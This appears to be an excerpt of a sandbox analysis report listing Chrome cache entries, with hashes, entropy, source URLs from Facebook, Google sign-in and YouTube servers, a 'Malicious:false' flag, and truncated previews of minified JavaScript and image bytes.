                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometFeedStoryMenuQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="7083058335113269"}),null);.__d("CometFeedStoryMenuQuery$Parameters",["CometFeedStoryMenuQuery_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("CometFeedStoryMenuQuery_facebookRelayOperation"),metadata:{},name:"CometFeedStoryMenuQuery",operationKind:"query",text:null}};e.exports=a}),null);.__d("CometFeedStoryMenuSection_promotion.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[],kind:"Fragment",metadata:null,name:"CometFeedStoryMenuSection_promotion",selections:[{alias:null,args:null,concreteType:"QuickPromotion",kind:"LinkedField",name:"local_alerts_story_menu_promotion",plural:!1,selections:[{args:null,kind:"FragmentSpread",name:"useCometTooltipQP_quickPromotion"}],storageKey:null}],type:"CometFeedStoryDefaultContextLayoutStrategy",abstractKey:null};e.exports=a}),null);.__d("useCometTooltipQP

                                                                                                                                                                                  Chrome Cache Entry: 851

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (405)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.234459115233662
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:kMYD7i1NPxJ3nktBNuryNPxyhzs/fdkTRxuAoMylW6MumIcu2yNPxxQ34OZI86y2:o7iHY0rs9ORxvoMylxr2sQJ7DNzfrw
                                                                                                                                                                                  MD5:967DFEEC6A7FD39DC7FE665E776702E2
                                                                                                                                                                                  SHA1:AA15F9DF789871C3AFAC0D31962E1E71F1D9CD58
                                                                                                                                                                                  SHA-256:D432D0BB701BE738D8E070DBFAEE681AB412F157E5ADBC63099309FC2DFF6252
                                                                                                                                                                                  SHA-512:461D5EE5A265CD8DEFD3EB0C286DAA5DAC8C115621CA9420694DA308093C0DA6280B3366B3C1ED5B4BF106CB2BC9AAB827E63B36D4E71447153581ADB18298AA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.NrxHlLi3bwM.L.B1.O/am=P2CJlmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,pxq3x,qPfo0c,qmdT9,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,ws9Tlc,xBaz7b,xQtZb,yRXbo,ywOR5c,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHX7bqWFdDNmEBWjhJk6Qjl972aUA/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:BDnJmb;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=w9hDv,VwDzFe,A7fCU"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("w9hDv");._.uf(_.hia);_.Yv=function(a){_.I.call(this,a.Ha);this.aa=a.Xa.cache};_.B(_.Yv,_.I);_.Yv.Oa=_.I.Oa;_.Yv.Ba=function(){return{Xa:{cache:_.gp}}};_.Yv.prototype.execute=function(a){_.wb(a,function(b){var c;_.qe(b)&&(c=b.Za.Nb(b.fb));c&&this.aa.JC(c)},this);return{}};_.Lq(_.Cia,_.Yv);._.l();._.k("VwDzFe");.var KE=function(a){_.I.call(this,a.Ha);this.aa=a.Ea.Oq;this.ea=a.Ea.metadata;this.da=a.Ea.Fq};_.B(KE,_.I);KE.Oa=_.I.Oa;KE.Ba=function(){return{Ea:{Oq:_.kE,metadata:_.lUa,Fq:_.hE}}};KE.prototype.execute=function(a){var b=this;a=this.da.create(a);return _.wb(a,function(c){var d=2===b.ea.getType(c.Bd())?b.aa.fc(c):b.aa.aa(c);return _.Tj(c,_.lE)?d.then(function(e){return _.Wc(e)}):d},this)};_.Lq(_.Hia,KE);._.l();._.k("sP4Vbe");._.kUa=new _.qk(_.Dia);._.l();._.k("A7fCU");.var pE=function(a){_.I.call(this,a.Ha);this.aa=a.Ea.nL};_.B(pE,_.I);pE.Oa=_.I.Oa;pE.Ba=function(){r

                                                                                                                                                                                  Chrome Cache Entry: 852

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (645)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):11085
                                                                                                                                                                                  Entropy (8bit):5.397976873792712
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:8losmj1Uqu+oCNLuZ08MnpAqntHMfG0v8X6JPRAkZE:JUEoCNLDpN8G0vDn9K
                                                                                                                                                                                  MD5:CE762A9D30D6C70BB0516E8CEFC958BF
                                                                                                                                                                                  SHA1:DA6CAC9C717DAA3A39F82F3421782C99EDD9329D
                                                                                                                                                                                  SHA-256:A9FC343D602527A427E57671D021524A9FF5AF7B3DF1A58900A3B01057BDD8C7
                                                                                                                                                                                  SHA-512:230753FBB26E90438DD43874D02FBBB1AD6DB9A0FE76DA978EA47A8CA06FC99DD5E475104ABB5DD25CE222423D9BDA7991FD0EE896386561CD6F9AC10F8932E2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/www-tampering.vflset/www-tampering.js
                                                                                                                                                                                  Preview:(function(){'use strict';function n(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var p="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function q(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var r=q(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var e=0;e<a.length-1;e++){var h=a[e];if(!(h in c))break a;c=c[h]}a=a[a.length-1];e=c[a];b=b(e);b!=e&&null!=b&&p(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(l){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(e+(l||"")+"_"+h++,l)}.function c(l,m){this.g=l;p(this,"description",{configurable:!0,writable:!0,value:m})}.if(a)

                                                                                                                                                                                  Chrome Cache Entry: 853

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1299)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):114292
                                                                                                                                                                                  Entropy (8bit):5.5528653263166285
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:BfaN1hvawAB3MAYcKh+CY0YcQ1rFPyY5c/F1FRLf+aD3Wp94yXCQC4NIT3PTtSGa:BfaNbAB3IacQLiPFRLf+e3g9bXcAITk
                                                                                                                                                                                  MD5:EA5144AB403234BE650A76530D1CB29D
                                                                                                                                                                                  SHA1:67DEE97C0AE2F912CE9F4CB1ADB9181857A01DF3
                                                                                                                                                                                  SHA-256:6EA25790432AA3DF786FF6518EAE8400D61081EE2A2206082C24B3FC6D4705DF
                                                                                                                                                                                  SHA-512:74998F4A928418639BCC2C4EE5BE2DABDC01D5D4C5E3C69BA606E9A0757D173EC542BBD3BD2CFC31CBC17057B421773778997A80F1C4925022DEE0A0B4CA0241
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.NrxHlLi3bwM.L.B1.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=AvtSve,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PrPYRd,Rkm0ef,SCuOPb,STuCOe,SpsfSb,UUJqVe,Uas9Hd,YHI3We,YTxL4,ZUKRxc,_b,_tp,aW3pY,b3kMqb,bSspM,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,inNHtf,lsjVmc,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,qmdT9,siKnQd,t2srLd,tUnxGc,vHEMJe,vfuNJf,ws9Tlc,xBaz7b,xQtZb,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlG2bCygi1DFAdwYKgmmvgAMIJrIdw/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:BDnJmb;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,Rusgnf,Ctsu,UPKV3d,bPkrc,W2YXuc,pxq3x,IZ1fbc,soHxf,kSPLL,qPfo0c,yRXbo,bTi8wc,ywOR5c,PHUIyb"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ltDFwf");.var Atb=_.y("ltDFwf");var AU=function(a){_.J.call(this,a.Ha);var b=this.oa();this.pb=this.Qa("P1ekSe");this.mb=this.Qa("cQwEuf");this.da=b.getData("progressvalue").number(0);this.ja=b.getData("buffervalue").number(1);this.Ca=b.zb("B6Vhqe");this.Ma=b.zb("juhVM");this.ta=b.zb("D6TUi");this.aa=b.zb("qdulke");this.La=0!==this.da;this.Ka=1!==this.ja;this.Fa=[];this.ea=_.$r(this).fc(function(){this.Fa.length&&(this.Fa.forEach(this.f9,this),this.Fa=[]);this.La&&(this.La=!1,_.Bq(this.pb,"transform","scaleX("+this.da+")"));this.Ka&&.(this.Ka=!1,_.Bq(this.mb,"transform","scaleX("+this.ja+")"));_.$q(b,"B6Vhqe",this.Ca);_.$q(b,"D6TUi",this.ta);_.$q(b,"juhVM",this.Ma);_.$q(b,"qdulke",this.aa)}).build();this.ea();_.zg&&_.$r(this).fc(function(){b.ob("ieri7c")}).Ae().build()();_.ez(this.oa().el(),this.Sa.bind(this))};_.B(AU,_.J);AU.Ba=_.J.Ba;.AU.prototype.Sa=function(a,b){Btb(

                                                                                                                                                                                  Chrome Cache Entry: 854

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 25 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):804
                                                                                                                                                                                  Entropy (8bit):5.9272601627884605
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:6v/7ykl/f/je0aVMrCwGPlc+Zen0JTSdoc9EdyBw3w6xuS8SNGqsaNg:onBaVHwGPlxen0NSucwXoSJN+8g
                                                                                                                                                                                  MD5:C156C107AE735C5F3813220235E0D11E
                                                                                                                                                                                  SHA1:F655A14E144551432AAE9BA0A7FE0E237A65AE51
                                                                                                                                                                                  SHA-256:D75C74B337113A0C65EBFF05ED63A487A0E158BC7246B987A28943667DF46C5B
                                                                                                                                                                                  SHA-512:A2729CA423327C0855BDC68374AE0EA6B211043EBD39A63B7248BF4E288B9641BF3F827EA01C4FB0444BCFBC68B6E06B51EEDE746668F14D4F7225B9B941CC81
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/q8Uic1K195T.png
                                                                                                                                                                                  Preview:.PNG........IHDR.......@......,n....PLTEGpL....................................................................................................................................................................................................................................................^.g...QtRNS..d....(..........B...:.>...0..XVLJ|<.t....Rv....6D4n.......@x.8...h..\... .NJ.!V....IDATx^...@...4Q@.yf.:1l.9.../3.M...l..U.#........$?...........kI]|.$GI&#.{.R..../d7$..x!.c..X..\B>...x./..X..[....SQ!@c\%..RNr"rrv.!.b.%.......j...n,...u..*).y.]."..r.b..P...B.FU....`.........s...,..y..(.3...!$.. ....F.(.a...g.?R.F.B:....$C...t...........\..N....c..2..`..VH.1..mF>.....t.L.MxDY....Y..U.6.$...O.(.....U.)/.e.mk..$.^.N....-........:.U.d.7...yp_i...Y.z....t..=...f#Q....IEND.B`.

                                                                                                                                                                                  Chrome Cache Entry: 855

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (709)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3940
                                                                                                                                                                                  Entropy (8bit):5.103789867340088
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:KOR0kZK2BOR0kFrVkzzQxPYqX9q2lqAEY8HIXOYl6nMLycA1:FVmRqb7Njnsq
                                                                                                                                                                                  MD5:B0941BDD004E6C28F0CB205A95383022
                                                                                                                                                                                  SHA1:00FDEBE11357C6D69F38060AEA80C20B59E70377
                                                                                                                                                                                  SHA-256:0B7A91A97CF2FC8E74DEE6DA487581FF30FC5A484F030937E7EF4B4DE5AB4771
                                                                                                                                                                                  SHA-512:8079DE1D8C68AFCD21C2E06CB73572E9A617AB949AD9CAD22C9D12CF495D852CFDF7114080DC29F211C9960084F9A2A053FA53D2B2938C3467D0FA958336C8DD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/EZcFVpNhrUH.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometVideoHomeCatalogRootQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="7332904830081595"}),null);.__d("CometVideoHomeCatalogRootQuery$Parameters",["CometVideoHomeCatalogRootQuery_facebookRelayOperation","StoriesRing.relayprovider"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("CometVideoHomeCatalogRootQuery_facebookRelayOperation"),metadata:{},name:"CometVideoHomeCatalogRootQuery",operationKind:"query",text:null,providedVariables:{__relay_internal__pv__StoriesRingrelayprovider:b("StoriesRing.relayprovider")}}};e.exports=a}),null);.__d("CometVideoHomeLiveRootQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="8274177899276614"}),null);.__d("CometVideoHomeLiveRootQuery$Parameters",["CometVideoHomeLiveRootQuery_facebookRelayOperation","StoriesRing.relayprovider"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("CometVideoHomeLiveRootQuery_facebookRelay

                                                                                                                                                                                  Chrome Cache Entry: 856

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 144 x 144, 8-bit colormap, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):729
                                                                                                                                                                                  Entropy (8bit):7.234317148111566
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:6v/753iqqqqqqqqqqqqqq8apRTOe/RlzL064pdYTCrQQXHth6oHS0iwPuOb254iu:u3iqqqqqqqqqqqqqq8sdOe/RBL0NpdAM
                                                                                                                                                                                  MD5:F6E5A9215D13C4AEF31D125532228410
                                                                                                                                                                                  SHA1:CF2AA58CCDDC2B414CAD4A28394EF66CD2AE9FFF
                                                                                                                                                                                  SHA-256:8639DB0DBAA462E7BC11D7884C3A6CB84275DC988811CD2BFAF5CF2E65BC0FE0
                                                                                                                                                                                  SHA-512:2468FD00812806E44A2EB1AEF7F408D643DCFBEE655802E69B62DCE21F84AE3EC6E50F6612F332CB35FF53EC4792104C27DFD6DA36327FBEADE9D7FABC7C3412
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.gstatic.com/youtube/img/branding/favicon/favicon_144x144.png
                                                                                                                                                                                  Preview:.PNG........IHDR...................cPLTE.......................................................PP.......... ..........@@....``.00.......pp........tRNS.@0 p.....P..`....Y.....IDATx...Ub.0.EQC.(.2..W9%......Y...eg.1..c.1H.C..$z.. ?......M.*.....R.. +.}.}t_0.m#.....T.....gje.9.7u..%.7...y..Q.D.Z..^vW..x......(.G..!R^..)..j4P...B.(H...igA(j.d...?...,.....DM8ZZ........:8...uCG.'...P....\....=..\<.\......=c.......H..`...+YD_.H...6vHa ur.....&.vJ.@.R.p..Ni.@.)..i......#.vJ.@.)...tJ......+..*.....-.S#...u.....}-.\.N..{.....m._.A.."n)..l...a...CmzV.ma....-D..K.....3...x...VH.i...V.2..u2..).J..cU4.....VX......\BC.`...V..:.(:.Y.(..h.O.\..dcC.Q..:..~Lm..&..{v]z0....9=....-/.O.g.1..c.1D..b..;...F....IEND.B`.

                                                                                                                                                                                  Chrome Cache Entry: 857

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1299)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):114247
                                                                                                                                                                                  Entropy (8bit):5.544641603898549
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:phAG62BDU8LQ5LK+I3cJUmYMWqdYyUpVh:vAd4UuQ5LK+I3cJxYMFdYL
                                                                                                                                                                                  MD5:8C532C1B272F9FBC389D7057F53FF028
                                                                                                                                                                                  SHA1:9ABF44513BD132FCC623C1C7E16440FF36A8E865
                                                                                                                                                                                  SHA-256:A1AF49D5C704C39091894150E9D3005454915DD88E1C482AD1CFC3FC4C9F0C6C
                                                                                                                                                                                  SHA-512:BE5EA13ADA16191A029B2631B3472ADA1968902BC9DE9E7340597256EA8B6F52582E78D455787371BFA24B630ED9C021BBBC1DD45ED052DE82D7E9B21C71AFBE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.y688-Pa0BpE.L.B1.O/am=P2CJlmMBEISZlnP-nnFyGAAAAAAAAAAArAHs/d=1/exm=AvtSve,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PrPYRd,Rkm0ef,SCuOPb,STuCOe,SpsfSb,UUJqVe,Uas9Hd,YHI3We,YTxL4,ZUKRxc,_b,_tp,aW3pY,b3kMqb,bSspM,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,inNHtf,lsjVmc,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,qmdT9,siKnQd,t2srLd,tUnxGc,vHEMJe,vfuNJf,ws9Tlc,xBaz7b,xQtZb,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHublJNG6l_TtY5gqKGP1QzXq7-qQ/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:yt7X5e;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,Rusgnf,Ctsu,UPKV3d,bPkrc,W2YXuc,pxq3x,IZ1fbc,soHxf,kSPLL,qPfo0c,yRXbo,bTi8wc,ywOR5c,PHUIyb"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ltDFwf");.var hub=_.y("ltDFwf");var tU=function(a){_.J.call(this,a.Ha);var b=this.oa();this.pb=this.Qa("P1ekSe");this.mb=this.Qa("cQwEuf");this.da=b.getData("progressvalue").number(0);this.ja=b.getData("buffervalue").number(1);this.Ca=b.zb("B6Vhqe");this.Ma=b.zb("juhVM");this.ta=b.zb("D6TUi");this.aa=b.zb("qdulke");this.La=0!==this.da;this.Ka=1!==this.ja;this.Fa=[];this.ea=_.xs(this).hc(function(){this.Fa.length&&(this.Fa.forEach(this.a9,this),this.Fa=[]);this.La&&(this.La=!1,_.Zq(this.pb,"transform","scaleX("+this.da+")"));this.Ka&&.(this.Ka=!1,_.Zq(this.mb,"transform","scaleX("+this.ja+")"));_.xr(b,"B6Vhqe",this.Ca);_.xr(b,"D6TUi",this.ta);_.xr(b,"juhVM",this.Ma);_.xr(b,"qdulke",this.aa)}).build();this.ea();_.Yg&&_.xs(this).hc(function(){b.ob("ieri7c")}).Ae().build()();_.cA(this.oa().el(),this.Sa.bind(this))};_.A(tU,_.J);tU.Ba=_.J.Ba;.tU.prototype.Sa=function(a,b){iub(

                                                                                                                                                                                  Chrome Cache Entry: 859

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x380, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):17093
                                                                                                                                                                                  Entropy (8bit):7.96447068998705
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:BrOyiiDdL2uQkJqI/DNBriI15Ky782Ifkxy0W1GyR:BqiMuQUn+Iuj22uVuPR
                                                                                                                                                                                  MD5:61CEACC04F220A519AFE2A778D67F137
                                                                                                                                                                                  SHA1:D5C38258BE80421C2CFA8EE674CE404C8539ADD8
                                                                                                                                                                                  SHA-256:02BF863416B9F4287206C37F71BED91EE74895F835B9780C4D805339697A9CCD
                                                                                                                                                                                  SHA-512:9D88C25A70FD5F7C7383B346531A904EF5401A95EB0C0213288C6533C52B7E0C1C58CA8EE441AC070ED100F0BFA391AD60F9EC34585352739A4AD3B70D074501
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426161004_5458613074262219_5404325336876649558_n.jpg?stp=dst-jpg_p206x206&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=qMp6reqdBbMAX9f8Hsn&_nc_ht=scontent-lga3-2.xx&oh=00_AfBU_SkaWyL_Y7s1XcAO7mCAeid69yPLDcmSSvrJYg_qqA&oe=65DA3DD4
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a700100001907000022100000b811000032130000ac1b0000fa280000142a0000d42b00006c2d0000c5420000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......|...."...............................................................................V.:...QZ./@.<..[..r....B<..Z.!t./i.Wq.....s.....;nxN........O.....t.....k..y..q.<..a.F..bo?.Q,v...G.sm..7..>).Y.d........T...K..'.........H..m..m8{!..6.g...m..#...^T.I...........{UC...m......e....u....x.....q$.....G.'...]; "`.[).-.3..D..m...\.).]=..{.V...~2...g....oD.....3.Sm.m.(.C.y.......x..?....v.N..5+.d........z.f_Q.sD...A..v...]...G..7I...O=...[.n..q^....=..+l..,..t..~...$8........\h...L../.I.l...#...\...S.C....G.N.|uf.h..M.._.8rTtwY...Q.~..P.R...b..}.sz>....4{;..+C....';.R%8..k...'Jpa^[)...j:....XR.J....'.!.q.lq.X.\G..at.2........3.^......p...v.yp...C.^ZR..!^_@...Z...k.;.v-Sa

                                                                                                                                                                                  Chrome Cache Entry: 860

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):77974
                                                                                                                                                                                  Entropy (8bit):7.9730922362653605
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:ndb/WEXnUWdZdFY1rmHqGTokGl/eQpGn7bA0P4+R03f001suHOhlLBGAylHs0lEh:ndrzUWd/gGThe5pwbAOSf0sB8BT0lEkA
                                                                                                                                                                                  MD5:E957D23C2D12F46D881FC41D65A5A5CC
                                                                                                                                                                                  SHA1:822E7A5671BC6393E5967A0234781FE6ED8649E5
                                                                                                                                                                                  SHA-256:5C381FFDF828C66C0B59E95444D194A2C90828B88BD83E66589F61855F7180F8
                                                                                                                                                                                  SHA-512:656AE944827FF895A9812F18F69C99A3BAAF2CB19A906F2064AC5CA5C2770518F35F06A55704A721866A4DC979FA93B20FFCBC8F62C437CAC0FE7223FDDAAD47
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/422667675_363952436343402_2541847446276462839_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=hHhlh6dV3PwAX-wNdAb&_nc_ht=scontent-lga3-2.xx&oh=00_AfDIhLXlbQZvkZLPHtZDoDz-zKhUcZLoSr5PhTRAfSilCw&oe=65DAB56D
